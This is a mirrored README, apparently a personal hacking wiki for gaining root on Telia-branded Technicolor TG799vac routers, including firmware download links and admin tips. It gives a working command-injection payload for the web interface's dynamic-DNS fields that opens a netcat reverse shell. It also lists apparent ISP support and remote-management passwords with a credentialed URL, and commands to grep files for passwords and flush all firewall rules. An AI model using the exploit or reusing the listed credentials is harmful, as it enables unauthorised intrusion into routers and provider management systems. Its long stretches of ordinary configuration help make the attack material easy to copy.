GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → wuseman → TG799VAC-XTREME-17.2-MINT

wuseman / TG799VAC-XTREME-17.2-MINT

Licence: other
My personal unique wiki for hacking the router firmware used by (Telia)TG799vac Xtream v17.2-MINT delivered from Technicolor

Programming Languages

c
50402 projects - #5 most used programming language
assembly
5116 projects
HTML
75241 projects
Makefile
30231 projects
shell
77523 projects
Roff
2310 projects

Labels

routercoolbackdooropenwrthackingsourcecodeuciminthackedthomsonbackdoorstechnicolorwusemantg799tg799vactelia

Projects that are alternatives of or similar to TG799VAC-XTREME-17.2-MINT

TG799VAC-XTREAM-V16.2-JADE
My personal unique wiki for hacking the router firmware used by (Telia)TG799vac Xtream Version 16.2 Jade delivered from Technicolor
Stars: ✭ 32 (-54.93%)
Mutual labels:  thomson, technicolor, wuseman, tg799, tg799vac, telia
SAGEMCOM-FAST-5370e-TELIA
This is my personal wiki for hacking the router firmware used by (Sagemcom)F@st Version 3.43.2 delivered from Sagemcom
Stars: ✭ 92 (+29.58%)
Mutual labels:  openwrt, uci, hacked, wuseman, telia
Familycloudspeederinshell
[ 天翼家庭云/天翼云盘提速 Shell 版 ] A Shell Implementation of FamilyCloudSpeeder, ESurfing
Stars: ✭ 154 (+116.9%)
Mutual labels:  router, openwrt
Luci Wrtbwmon
Bandwidth tracker for OpenWRT that uses wrtbwmon
Stars: ✭ 201 (+183.1%)
Mutual labels:  router, openwrt
nodewatcher-agent
A monitoring agent that runs on OpenWrt-supported devices.
Stars: ✭ 14 (-80.28%)
Mutual labels:  openwrt, uci
Xunleikuainiaoinshell
[ 迅雷快鸟 Shell 版 ] A Shell Implementation of Kuainiao, Xunlei
Stars: ✭ 102 (+43.66%)
Mutual labels:  router, openwrt
Docker Openwrt
OpenWrt running in Docker
Stars: ✭ 107 (+50.7%)
Mutual labels:  router, openwrt
go-uci
Native Go bindings for OpenWrt's UCI.
Stars: ✭ 69 (-2.82%)
Mutual labels:  openwrt, uci
Openwrtinvasion
Root shell exploit for several Xiaomi routers: 4A Gigabit, 4A 100M, 4, 4C, 3Gv2, 4Q, miWifi 3C...
Stars: ✭ 366 (+415.49%)
Mutual labels:  router, openwrt
MSBackdoor
[Discontinued] Transform your payload into fake powerpoint (.ppt)
Stars: ✭ 35 (-50.7%)
Mutual labels:  backdoor, backdoors
BackToMe
Little tool made in python to create payloads for Linux, Windows and OSX with unique handler
Stars: ✭ 61 (-14.08%)
Mutual labels:  backdoor, backdoors
Fast Path Lede Openwrt
PLEASE GO TO NEW OPENWRT TRUNK BASED SFE FIRMWARE ->
Stars: ✭ 96 (+35.21%)
Mutual labels:  router, openwrt
Actions Openwrt K2p
Use Github Actions to automatically compile Lean's Modified Lede source for K2P
Stars: ✭ 67 (-5.63%)
Mutual labels:  router, openwrt
Ansible Openwisp2 Imagegenerator
Automatically build several openwisp2 firmware images for different organizations while keeping track of their differences
Stars: ✭ 122 (+71.83%)
Mutual labels:  router, openwrt
Xunlei Fastdick
迅雷快鸟 Xunlei Network Accelerator For Router
Stars: ✭ 789 (+1011.27%)
Mutual labels:  router, openwrt
YAWAC
Yet Another Wifi Auto Connect (YAWAC) is a shell script to connect to a dataset of wireless connection and free hotspot like FreeWifi. It's works on OpenWrt.
Stars: ✭ 22 (-69.01%)
Mutual labels:  router, openwrt
Bamf
A tool which utilizes Shodan to detect vulnerable IoT devices.
Stars: ✭ 269 (+278.87%)
Mutual labels:  router, backdoor
Asuswrt Merlin Transparent Proxy
transparent proxy base on ss, v2ray, ipset, iptables, chinadns on asuswrt merlin.
Stars: ✭ 367 (+416.9%)
Mutual labels:  router, openwrt
RSB-Framework
Windows/Linux - ReverseShellBackdoor Framework
Stars: ✭ 44 (-38.03%)
Mutual labels:  backdoor, backdoors
openwrt
OpenWrt Stable 1907 with lean's package
Stars: ✭ 55 (-22.54%)
Mutual labels:  router, openwrt
View All Similar Projects ➔

# TG799VAC-XTREME-17.2-MINT

wuseman edition

Latest firmware with full root access

Autism in all its glory, the greatest credit goes to our friend: weaponizedautism

https://weaponizedautism.wordpress.com/2017/07/14/vulnerabilities-in-technicolor-adsl-residential-gateways

Msg To TeliaCompany AB: This is cause you blacklsited me AND because the Violations of the GNU Licenses for both technicolor, motorola and sagemcom. I asked several times without get access to the source code.

When you release your software under the GPL, it means you give anyone a license to use your software under some terms and agreements. If somebody violates the agreement, you are in breach of contract with you. This means I can sue them in a court of law. Please read more here: https://www.gnu.org/licenses/gpl-violation.en.html - Fuck you Telia!

Telia User-Agents:

IpTV............: KreaTVWebKit/600 (Motorola STB; Linux; 5305)
Server..........: Apache-Coyote/1.1
Cisco Switch....: Wget   
WEB.............:

Default password for Telias employees:

Old Password....: _T3L1a!SuPPor7   
New Password:...: SUPP0r7!W1f1R0uT3r 
Remote IP.......: 131.116.22.242
Remote IP.......: uci show mwan.remoteassist.dest_ip

Shell password for Technicolor devices:

Login...........: root
Password........: root

Assistance Password:

Login...........: assistance                  (uci get web.remote)
Password........: random                      ()
Port............: 60443                       (uci get web.remote.port)
Interface.......: mgmt                        (uci get web.remote.interface)
Enable..........: uci set web.remote.active=1
Disable.........: uci set web.remote.active=0
Ngwfdd
Login...........: telia
Password........: ZDgFbBH5jQvUocL7
Remote IP.......: .
Remote DNS......: telia-gw.tgwfd.org
Remote Port.....: 8443
Via Shell.......: uci get ngwfdd.config.base_url
Full URL........: https://telia:[email protected]:8443/
My other repositorys similiar to this oné
Cisco...........: https://cisco.nr1.nu/
Sagemcom........: https://sagemcom.nr1.nu/
Technicolor0....: https://technicolor.nr1.nu/    
Technicolor1....: https://github.com/wuseman/TG799vnv2-10.5.1.Q-SMART-3.6.1
Technicolor2....: https://github.com/wuseman/TG799VAC-XTREAM-V16.2-JADE
Technicolor4....: https://github.com/wuseman/TG799VAC-XTREME-17.2-MINT
Never ever use below command unless you know exactly what you are doing:
echo "bank_2" > /proc/bankversion/active

Boards

Telia - Board: VANT-W

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/172339w1441004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/172339w1441020closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/172405w1441030closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/1627732w2221002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/15516436w1361002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/15516436w1361005closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-W_Telia/15516436w1361006closed.rbi

Telia - Board: VANT-R

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/172339r1021008closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/172339r1021022closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/172405r1021034closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/1627732r2221004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/15516436r1361008closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VANT-R_Telia/telia-vant-r_15.51.6436-1361003-bank_dump.xz

Telia - Board: VBNT-H

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172339h1441002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172339h1441002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172405h1441028closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/1627732h2221002closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172339h1441018closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VBNT-H_Telia/172405h1441042closed.rbi (latest)

Telia - Board: VDNT-O

Screenshot

Download URLS:

https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/172339o1901024closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/1627732o2221004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/1720405o1901012closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/15516436o1361004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/15516436o1361004closed.rbi
https://wuseman.nr1.nu/firmwares/technicolor/VDNT-O_Telia/telia-vdnt-o_10.5.1.Q-bank_dump.xz

SSH

  • SHORT VERSION

Screenshot

  • Please wait 20-30 seconds before you trying to ssh into your router
  • Connect to router: 'ssh [email protected]'
  • Default password: root
  • You now got shell access with full root access.
  • Copy and paste all this stuff in dyndns field in webgui (edit ip):
::::::;nc 192.168.1.144 1337 -e /bin/sh

/ LONG VERSION:

Screenshot

  • Let's begin. Fire up a terminal of any kind and just run the awesome netcat tool and listen on a port:
nc -lvvp 1337
  • Go to the WAN Services and press SHOW ADVANCED. In username, password and domain field you need type the below command, after this is done just enable the dyndns. It wont matter wich hoster you choose just pick one, press save and just wait 4-5 seconds and you have just got full root access of your TG799VAC Xtreme 17.2 Mint, check preview video above if you do not understand
:::::::;nc [machine_IP] 1337 -e /bin/sh
  • You will see something similiar and if you see this then you got root access, type ls / for example:
listening on [any] 1337 ...
connect to [192.168.1.144] from router [192.168.1.1] 40980
  • Enjoy root access.

OPKG

  • Below commands will give you a working opkg setup, copy and paste:

#Screenshot

rm /etc/opkg/distfeeds.conf
cat << "EOF" > /etc/opkg/customfeeds.conf
src/gz chaos_calmer_base http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/base
src/gz chaos_calmer_packages http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/packages
src/gz chaos_calmer_luci http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/luci
src/gz chaos_calmer_routing http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/routing
src/gz chaos_calmer_telephony http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/telephony
src/gz chaos_calmer_management http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/generic/packages/management
EOF
cat << "EOF" > /etc/opkg.conf
arch all 1
arch all 100
arch noarch 1
arch brcm63xx 3
arch brcm63xx-tch 10
arch brcm63xx 200
arch brcm63xx-tch 300
dest root /
dest ram /tmp
lists_dir ext /var/opkg-lists
option overlay_root /overlay
EOF
  • Update repositorys and install sftp-server
opkg update
opkg install openssh-sftp-server
ash -c /usr/libexec/sftp-server
#opkg list-upgradable|cut -d' ' -f1|xargs opkg upgrade

Configure dropbear so we can ssh into the device

  • Harden security by disabling password authentication.
#### MGMT 
uci set dropbear.mgmt.enable=0
uci set dropbear.mgmt.PasswordAuth=off
uci set dropbear.mgmt.RootPasswordAuth=off
uci set dropbear.mgmt.Port=22
uci set dropbear.mgmt.Interface=mgmt
uci set dropbear.mgmt.AllowedClientIPs=131.116.22.242/32
### WAN
uci set dropbear.wan.enable=0
uci set dropbear.wan.PasswordAuth=off
uci set dropbear.wan.RootPasswordAuth=off
uci set dropbear.wan.Interface=wan
uci set dropbear.lan.IdleTimeout=3600
uci set dropbear.lan.SSHKeepAlive=0
uci set dropbear.lan.enable=1
uci set dropbear.lan.Port=22
uci set dropbear.lan.BannerFile=/etc/banner
uci set dropbear.lan.RootLogin=1
uci set dropbear.lan.GatewayPorts=
uci set dropbear.lan.rsakeyfile=
uci set dropbear.lan.mdns=0
uci set dropbear.lan.MaxAuthTries=2
uci set dropbear.wan.AllowedClientIPs=131.116.22.242/32
### LAN
uci set dropbear.lan.enable=1
uci set dropbear.lan.PasswordAuth=on
uci set dropbear.lan.RootPasswordAuth=on
uci set dropbear.lan.Interface=lan
uci set dropbear.lan.IdleTimeout=3600
uci set dropbear.lan.SSHKeepAlive=0
uci set dropbear.lan.Port=22
uci set dropbear.lan.BannerFile=
uci set dropbear.lan.RootLogin=1
uci set dropbear.lan.GatewayPorts=
uci set dropbear.lan.rsakeyfile=
uci set dropbear.lan.mdns=0
uci set dropbear.lan.MaxAuthTries=2
  • Setup proper permissions for dropbaar path:
chmod -R u=rwX,go= /etc/dropbear
  • Apply changes and restart dropbear
uci commit
/etc/init.d/dropbear restart
  • Add your ssh key:
ssh [email protected] "tee -a /etc/dropbear/authorized_keys" < ~/.ssh/id_rsa.pub

WebUI

There is many settings in the .lp files in the web directory that deny 'admin' from edit settings, see below example and how to fix this:

Example:

Inside /www/docroot/cards/snippets/002_broadband_xdsl.lp:

if session:getrole() == "superuser" or session:getrole() == "telia" then
  • Find all those settings if you are curios:
find /www -type f -exec grep -i 'canAdd = false' {} \;
find /www -type f -exec grep -i 'canApply = false' {} \;
find /www -type f -exec grep -i 'canEdit = false' {} \;
find /www -type f -exec grep -i 'canRemove = false' {} \;
  • Run below for get access to all settings:
find /www -type f -exec sed -i 's/"telia"/"admin"/g'  {} \;
find /www -type f -exec sed -i 's/"superuser"/"admin"/g'  {} \;
find /www -type f -exec sed -i 's/"engineer"/"admin"/g'  {} \;
  • Copy and paste below to get full access on webUI and all the cards that exist:
for missed_roles in $(uci show|grep \.roles|grep -v admin|cut -d'=' -f1|sed 's/$/=admin/g'); do
    uci add_list ${missed_roles}; 
done
  • It is required to restart nginx:
/etc/init.d/nginx restart
  • Enjoy! You are now superduper admin on your own router.

Session and Tokens:

  • Get CSFR token via cli:
curl -sL http://192.168.1.1/login.lp?action=getcsrf
  • Get CSFR token via your browsers developer console:
/*Open prefered browser
Press F12
Go to Console tab
Paste below*/
$("meta[name=CSRFtoken]").attr("content")

Advanced info (Tokens/Sessions/Auth/Login):

Advanced settings about how we cunderstand the auth processes and more about interesting stuff for webUI:

For understand how token/sesssions/proxy stuff on router when login on webUI, the files below is importnat: Validate the given token against the session's token. Verify user has access via the interface the request was received on

-- Change SRP parameters and crypted password of the current user of this session.
-- @param salt A newly generated SRP salt for the updated password
-- @param verifier A newly calculated SRP verifier for the generated salt and updated password
-- @param cryptedpassword A newly calculated crypted password. This parameter is optional,
-- set to nil if CLI password update is to be omitted
-- @return true or nil, error message

  local proxy = {
    getusername = getusername,
    isdefaultuser = isdefaultuser,
    toggleDefaultUser = toggleDefaultUser,
    getrole = getrole,
    store = store,
    retrieve = retrieve,
    logout = logout,
    hasAccess = hasAccess,
    getCSRFtoken = getCSRFtoken,
    checkCSRFtoken = checkCSRFtoken,
    addUserToManager = addUserToManager,
    delUserFromManager = delUserFromManager,
    reloadAllUsers = reloadAllUsers,
    changePassword = changePassword,
    getUserCount = getUserCount
  }

     __metatable = "ah ah ah, you didn't say the magic word"

  • Folders/Files for session and cookies can be found in::

  • Session/SessionManager:

    /usr/lib/lua/web/session.lua
    /usr/lib/lua/web/ssessioncontrol.lua
    /usr/lib/lua/web/ssessionmgr.lua
  • Sockets
/usr/lib/lua/socket/core.so
/usr/lib/lua/socket/headers.lua
/usr/lib/lua/socket/http.lua
  • Session and cookies is geneerated by files in below folder:
local _M = socket.http
_M.TIMEOUT = 60
_M.PORT = 80
_M.USERAGENT = socket._VERSION
-- Reads MIME headers from a connection, unfolding where needed
function _M.open(host, port, create)
    h.try(c:settimeout(_M.TIMEOUT))
    h.try(c:connect(host, port or _M.PORT))
    if not reqt.proxy and not _M.PROXY then
    local proxy = reqt.proxy or _M.PROXY
        ["user-agent"] = _M.USERAGENT,
    port = _M.PORT,
    local h = _M.open(nreqt.host, nreqt.port, nreqt.create)
_M.request = socket.protect(function(reqt, body)
return _M
c

ḾiSC

  • Add your own user without any extra tools:

Screenshot

OPKG

With below setting you will be allowed to install packages from more repos:
cat << "EOF" > /etc/opkg.conf 
arch all 1
arch noarch 1
arch brcm63xx 3
arch brcm63xx-tch 10
EOF
cat << "EOF" >> /etc/opkg/distfeeds.conf
src/gz chaos_calmer http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/base
src/gz luci http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/luci
src/gz management http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/management
src/gz routing http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/routing
src/gz packages http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/packages
src/gz telephony http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/telephony
EOF

BootP/TFTP

Screenshot

  • Client wise:

Switch device power off (or pull the power cord). Connect a client to the device via Ethernet to LAN1, trigger the rescue function by pressing and holding the reset button of the device and then turning the device on (or plug in the power cord). You can release the reset button after a few seconds.

The device will take ~15-20 seconds to boot a mini-web server, that provides only a single function: it can upload a firmware file and has a button to trigger the flash process. The web-server will usually be available under either (if in doubt, try both)

http://192.168.1.1

Install atftpd on a Gentoo Machine (OpenRC)

emerge --sync
emerge -a atftpd
mkdir /mnt/tftp
cp <firmware.bin> /mnt/tftp/
chown nobody:nogroup -R /mnt/tftp
cat << "EOF" > /etc/conf.d/atftp
TFTPD_ROOT="/mnt/tftp"
TFTPD_OPTS="--daemon --user nobody --group nobody"
/etc/init.d/atftpd start
EOF

  • Thats it, now use getent to confirm it is up and running:

  • Server Wise: (router)

getent services tftp

Server Wise (router)

uci set dhcp.dnsmasq.enable_tftp='1'
  • First you need to setup a static ip to be able to communicate with router:
ifconfig eth0 192.168.1.2 netmask 255.255.255.0 up 
route add default gw 192.168.1.1
echo "nameserver 192.168.1.1" > /etc/resolv.conf
tcpdump -i enp0s31f6 -vvv -s 0 port bootps
  • When tg799 router reporting BOOTP then run below command:
atftp --trace --option "timeout 1" --option "mode octet" --put --local-file tg799bin.firmware.rbi 192.168.1.1

Got stuck with some packages that says error opening terminal? No worries - This is caused cause colors - Run below command to fix the xterm problem:

Screenshot



Old Stuff (Various)


    

  • Run uci-whois.sh from scripts dir to whois all ip's that your isp added for various settings:
    • 



Screenshot


-- Mount root as read and write:


mount -o remount,rw /


    

  • If you want sort all settings by file, do as below:
    • 



Screenshot


mkdir /tmp/uci_sorted;
cd /tmp/uci_sorted;

for uci_settings in "$(uci show | awk -F. '{print $1}' | uniq)"; do 
    uci show ${uci_settings} > /tmp/uci_sorted/${uci_settings};
done


    

  • List all files where password, pass or/and key is readable in ascii:
    • 



find /usr/ -type f -exec grep -Ei "pass|password|key" {} \;


    

  • List all files where password, pass or/and key in all files:
    • 



find /usr/ -type f -exec strings -n20 'password' {} \;


    

  • Turning off Power-Saving features
    • 



pwrctl config --cpuspeed 0
pwrctl config --wait off
pwrctl config --ethapd off
pwrctl config --eee off
pwrctl config --autogreeen off


    

  • Configure DNS via cli:
    • 



cat << "EOF"  > /etc/config/ddns 
config service 'myddns_ipv4'
    option interface 'wan'
    option ip_source 'network'
    option ip_network 'wan'
    option use_https '1'
    option cacert 'IGNORE'
    option force_interval '36500'
    option force_unit 'days'
    option enabled '1'
    option password 'password'
    option username 'domain.com'
    option service_name 'loopia.se'
    option lookup_host 'domain.com'
    option domain 'domain.com'"
EOF


    

  • List all URLs for your firmware that can be downloaded:
    • 



This part has its own repository now


strings /etc/cwmpd.db
    SQLite format 3
    tabletidkvtidkv
    CREATE TABLE tidkv (  type TEXT NOT NULL,  id TEXT NOT NULL,  key TEXT NOT NULL,  value TEXT,  PRIMARY KEY (type, id, key)))
    indexsqlite_autoindex_tidkv_1tidkv
    transferPassword5
    transfer Username
    Stransfer URLhttp://192.168.21.52:7547/ACS-server
    5transferaStartTime2018-08-19T15:20:13Z
    transfera FaultStringcomplete
    transfera FaultCode0M_
    M%5transfera CompleteTime2018-08-19T15:19:57Z
    'transfera TimeStamp244,9XXXXXX
    transfera DelaySeconds3
    transfera Password
    transfera Username
    runtimevarParameterKey#
    runtimevarConfigurationVersionD
    %_runtimevarBootStrappedhttps://acs.telia.com:7575/ACS-server/ACS-
     +/VersionsSoftwareVersion16.2.XXXXXX
    transfer FaultString
    transfer FaultCode
    transfer TimeSt6
    transfera UsernameU
    transfera URLT7
    transfera TimeStampX
    transfera SubStatec
    transfera Stateb7
    transfera StartTimed
    transfera PasswordV


    

  • List network devices:
    • 



awk '{print $1}' /proc/net/dev


    

  • Disable all firewall rules (until you reboots or relaods)
    • 



iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X


    

  • Changing max sync speed on your modem:
    • 



uci set xdsl.dsl0.maxaggrdatarate='200000' # 16000 default
uci set xdsl.dsl0.maxdsdatarate='140000'   # 11000 default
uci set xdsl.dsl0.maxusdatarate='60000'    # 40000 default


    

  • Enable or Disable dnsmasq:
    • 



uci show dhcp.lan.ignore='1'


    

  • Enable or Disable network time server:
    • 



uci set system.ntp.enable_server='1'


    

  • Edit nsplink to something else (where you get redirected when you click on the logo at top)
    • 



uci set web.uidefault.nsplink='https://wuseman.nr1.nu'


    

  • This will show all traffic on your router with netstat:
    • 



netstat -tulnp


    

  • This will show all ip numbers connected to your router atm..
    • 



netstat -lantp | grep ESTABLISHED |awk '{print $5}' | awk -F: '{print $1}' | sort -u


    

  • 

    Capture traffic on all interfaces (add -i wl0 for include wifi):
    

    • 

  • 

    Via wireshark on your pc:
    

    • 



ssh root@router tcpdump -i eth4 -U -s0 -w - 'not port 22' | wireshark -k -i -   
```sh


- On router:

```sh
tcpdump -vvv -ttt -p -U
tcpdump -i wl0 -vvv -ttt -p -U


    

  • List all settings were IPv4 addresses is added:
    • 



uci show | grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"


-List all interfaces mac-addr:


ifconfig -a  | sed '/eth\|wl/!d;s/ Link.*HWaddr//'
    eth0      X0:X0:X0:X0:X0:X0
    eth1      X0:X0:X0:X0:X0:X0
    eth2      X0:X0:X0:X0:X0:X0
    eth3      X0:X0:X0:X0:X0:X0
    eth4      X0:X0:X0:X0:X0:X0
    eth5      X0:X0:X0:X0:X0:X0
    vlan_eth0 X0:X0:X0:X0:X0:X0
    vlan_eth1 X0:X0:X0:X0:X0:X0
    vlan_eth2 X0:X0:X0:X0:X0:X0
    vlan_eth3 X0:X0:X0:X0:X0:X0
    vlan_eth5 X0:X0:X0:X0:X0:X0
    wl0       X0:X0:X0:X0:X0:X0
    wl0_1     X0:X0:X0:X0:X0:X0
    wl0_2     X0:X0:X0:X0:X0:X0


syslog-ng


    

  • Set syslog settings in system file
    • 



cat << "EOF" > /etc/config/system
config system

    option log_filter_ip '192.168.1.208'
    option log_port '514'
    option hostname 'router'
    option zonename 'Europe/Stockholm'
    option timezone 'CET-1CEST,M3.5.0,M10.5.0/3'
    option network_timezone '1'
    option hw_reboot_count '0'
    option sw_reboot_count '0'
    option cronloglevel '5'

# Filters for /modals/logviewer-modal.lp and what to send to syslog-ng server

    list log_filter 'Everything'
    list log_filter 'warmboot'
    list log_filter 'cwmp'
    list log_filter 'cwmpd'
    list log_filter 'crond'
    list log_filter 'Critical'
    list log_filter 'Zonewatcher'
    list log_filter 'wifiinfo'
    list log_filter 'wifi'
    list log_filter 'mmpbxd'
    list log_filter 'transformer'
    list log_filter 'zoneredird'
    list log_filter 'zone_daemon'
    list log_filter 'syslog'
    list log_filter 'root'
    list log_filter 'premiumd'
    list log_filter 'lua'
    list log_filter 'nginx'
    list log_filter 'kernel'
    list log_filter 'ipks'
    list log_filter 'ipk'
    list log_filter 'root'
    list log_filter 'user'
    list log_filter 'mwan'
    list log_filter 'lan'
    list log_filter 'vlan'
    list log_filter 'opkg'
    list log_filter 'hostmanager'
    list log_filter 'hostapd'
    list log_filter 'fseventd'
    list log_filter 'dnsmasq-dhcp'
    list log_filter 'dnsmasq'
    list log_filter 'ddns-scripts'
    list log_filter 'awk'
    list log_filter 'assist.remote'
    list log_filter 'assist'
    list log_filter 'ash'
    list log_filter 'bash'
    list log_filter 'sh'
    list log_filter 'clash'
    list log_filter 'user.notice'
    list log_filter 'auth'
    list log_filter 'pppoe-relay-hotplug'
    list log_filter 'odhcpd'
    list log_filter 'ipsec_starter'
    list log_filter 'ipsec'
    list log_filter 'insmod'
    list log_filter 'modprobe'
    list log_filter 'rmmod'
    list log_filter 'vpn'
    list log_filter 'openvpn'
    list log_filter 'netifd'
    list log_filter 'wansensing'
    list log_filter 'miniupnpd'
    list log_filter 'user.info'
    list log_filter 'guest'
    list log_filter 'wget'
    list log_filter 'curl'
    list log_filter 'ssh'
    list log_filter 'sshd'
    list log_filter 'telnet'
    list log_filter 'http'
    list log_filter 'https'
    list log_filter 'ftp'
    list log_filter 'ftpd'
    list log_filter 'uci'
    list log_filter 'postmortem'
    list log_filter 'trafficmon.voip'

config timeserver 'ntp'
    option enable_server '1'
    option program '/sbin/firstusedate'
    list server 'ntp1.rgw.telia.se'
    list server 'ntp2.rgw.telia.se'
    list server '0.se.pool.ntp.org'
    list server '1.se.pool.ntp.org'
    list server '2.se.pool.ntp.org'
    list server '3.se.pool.ntp.org'
    list server 'time.google.com'
    list server 'time1.google.com'
    list server 'time2.google.com'
    list server 'time3.google.com'
    list server 'time4.google.com'

config config config
     option export_plaintext  '1'
     option export_unsigned   '1'
     option import_plaintext  '1'
     option import_unsigned   '1'
     option usb_filesystem_charset 'utf8'

config coredump
    option path '/root'
    option url 'https://telia-core.tgwfd.org:5443/'
    option action 'ignore'
    option reboot '0'

config log 'logread'
    option path 'logread'

config trafficmon
    option interface 'wan'
    option minute '*/720'

config trafficmon
    option interface 'mgmt'
    option minute '*/720'

config trafficmon
    option interface 'voip'
    option minute '*/720'

config trafficmon
    option interface 'iptv'
    option minute '*/720'
    option sw_reboot_count '0'

    config time 'time'
EOF


Now restart system:


/etc/init.d/system restart


    

  • Syslog-ng server you want store logs from router:
    • 



Screenshot


@version: 3.30
@include "scl.conf"

options {
create_dirs(yes);
owner(wuseman);
group(wuseman);
perm(0644);
dir_owner(wuseman);
dir_group(wuseman);
dir_perm(0755);
};
 
 
source s_udp {
network (
ip-protocol(6)
transport("udp")
port(514)
);
network (
transport("udp")
port(514)
);
};

destination d_host-specific {
file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-syslog.log");
};

log {
source(s_udp);
destination(d_host-specific);
};


source src {
unix-stream("/dev/log" max-connections(256));
internal();
};

source kernsrc { file("/proc/kmsg"); };

# define destinations
destination authlog { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-auth.log"); };
destination syslog { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-syslog"); };
destination cron { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-cron.log"); };
destination daemon { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-daemon.log"); };
destination kern { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-kern.log"); };
destination lpr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-lpr.log"); };
destination user { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-user.log"); };
destination mail { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.log"); };
destination mailinfo { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.info"); };
destination mailwarn { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.warn"); };
destination mailerr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.err"); };
destination newscrit { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.crit"); };
destination newserr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.err"); };
destination newsnotice { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.notice"); };
destination debug { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-debug"); };
destination messages { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-messages"); };
destination console { usertty("root"); };
destination console_all { file("/dev/tty12"); };
#destination console_all { file("/dev/console"); };
filter f_authpriv { facility(auth, authpriv); };
filter f_syslog { not facility(authpriv, mail); };
filter f_cron { facility(cron); };
filter f_daemon { facility(daemon); };
filter f_kern { facility(kern); };
filter f_lpr { facility(lpr); };
filter f_mail { facility(mail); };
filter f_user { facility(user); };
filter f_debug { not facility(auth, authpriv, news, mail); };
filter f_messages { level(info..warn)
and not facility(auth, authpriv, mail, news); };
filter f_emergency { level(emerg); };
filter f_info { level(info); };
filter f_notice { level(notice); };
filter f_warn { level(warn); };
filter f_crit { level(crit); };
filter f_err { level(err); };
filter f_failed { message("failed"); };
filter f_denied { message("denied"); };

# connect filter and destination
log { source(src); filter(f_authpriv); destination(authlog); };
log { source(src); filter(f_syslog); destination(syslog); };
log { source(src); filter(f_cron); destination(cron); };
log { source(src); filter(f_daemon); destination(daemon); };
log { source(kernsrc); filter(f_kern); destination(kern); };
log { source(src); filter(f_lpr); destination(lpr); };
log { source(src); filter(f_mail); destination(mail); };
log { source(src); filter(f_user); destination(user); };
log { source(src); filter(f_mail); filter(f_info); destination(mailinfo); };
log { source(src); filter(f_mail); filter(f_warn); destination(mailwarn); };
log { source(src); filter(f_mail); filter(f_err); destination(mailerr); };
log { source(src); filter(f_debug); destination(debug); };
log { source(src); filter(f_messages); destination(messages); };
log { source(src); filter(f_emergency); destination(console); };

# default log
log { source(src); destination(console_all); };


    

